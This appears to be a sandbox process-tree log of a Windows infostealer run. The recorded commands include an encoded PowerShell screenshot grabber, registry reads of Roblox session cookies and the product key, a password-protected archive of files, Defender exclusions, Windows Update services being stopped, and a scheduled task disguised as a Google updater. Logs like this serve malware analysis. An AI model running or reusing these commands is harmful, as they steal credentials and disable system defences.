C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="8⤵PID:3200
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\broq1mff\broq1mff.cmdline"10⤵PID:8240
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE2B.tmp" "c:\Users\Admin\AppData\Local\Temp\broq1mff\CSCBE6758636FB54BC4B43176B7278ED131.TMP"11⤵PID:6252
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"8⤵PID:5908
-
C:\Windows\system32\tree.comtree /A /F9⤵PID:6168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"8⤵PID:8900
-
C:\Windows\system32\tree.comtree /A /F9⤵PID:8284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"8⤵PID:6428
-
C:\Windows\system32\tree.comtree /A /F9⤵PID:6316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"8⤵PID:6260
-
C:\Windows\system32\tree.comtree /A /F9⤵PID:3372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"8⤵PID:5684
-
C:\Windows\system32\tree.comtree /A /F9⤵PID:9236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"8⤵PID:9416
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:9468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"8⤵PID:9676
-
C:\Windows\system32\getmac.exegetmac9⤵PID:9736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"8⤵PID:9780
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:9936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI24482\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\okqKR.zip" *"8⤵PID:2724
-
C:\Users\Admin\AppData\Local\Temp\_MEI24482\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI24482\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\okqKR.zip" *9⤵
- Executes dropped EXE
PID:5824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"8⤵PID:324
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption9⤵
- Suspicious use of AdjustPrivilegeToken
PID:4348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"8⤵PID:10008
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory9⤵PID:1384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"8⤵PID:3200
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid9⤵PID:5688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"8⤵PID:1216
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER9⤵
- Suspicious behavior: EnumeratesProcesses
PID:5864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"8⤵PID:9492
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name9⤵
- Detects videocard installed
PID:9592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"8⤵PID:5772
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:5188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault9⤵PID:9672
-
-
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:7424
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:7448
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:7652
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:7664
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2004
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4532
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:6048
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:9940
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"2⤵PID:6072
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1788
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:9048 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2404
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:5720
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4000
-
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:9392
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2768
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:9268
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3652
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:9352
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:9520
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"2⤵
- Scheduled Task/Job: Scheduled Task
PID:9552 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:9540
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:9488
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:9700
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap3012:264:7zEvent5895 -t7z -sae -- "C:\Users\Admin\AppData\Local\Temp\Temp.7z"2⤵
- Suspicious use of FindShellTrayWindow
PID:7792
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap4031:264:7zEvent23131 -tzip -sae -- "C:\Users\Admin\AppData\Local\Temp\Temp.zip"2⤵
- Suspicious use of FindShellTrayWindow
PID:10012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6504 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x138,0x13c,0x140,0x114,0x144,0x7ffa05b0cc40,0x7ffa05b0cc4c,0x7ffa05b0cc583⤵PID:6280
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6280 -s 10724⤵PID:4356
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1884,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=1876 /prefetch:23⤵PID:8084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2216,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2228 /prefetch:33⤵PID:8096
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2296,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2304 /prefetch:83⤵PID:7568
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3204,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3224 /prefetch:13⤵PID:8932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3428,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3440 /prefetch:13⤵PID:5980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3712,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4644 /prefetch:13⤵PID:10180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4860,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4872 /prefetch:83⤵PID:7268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4732,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4924 /prefetch:83⤵PID:8308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3488,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3268 /prefetch:13⤵PID:9544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3252,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3532 /prefetch:13⤵PID:2444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4876,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3220 /prefetch:13⤵PID:8632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5228,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3376 /prefetch:13⤵PID:1572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4856,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4748 /prefetch:13⤵PID:6012
-
-
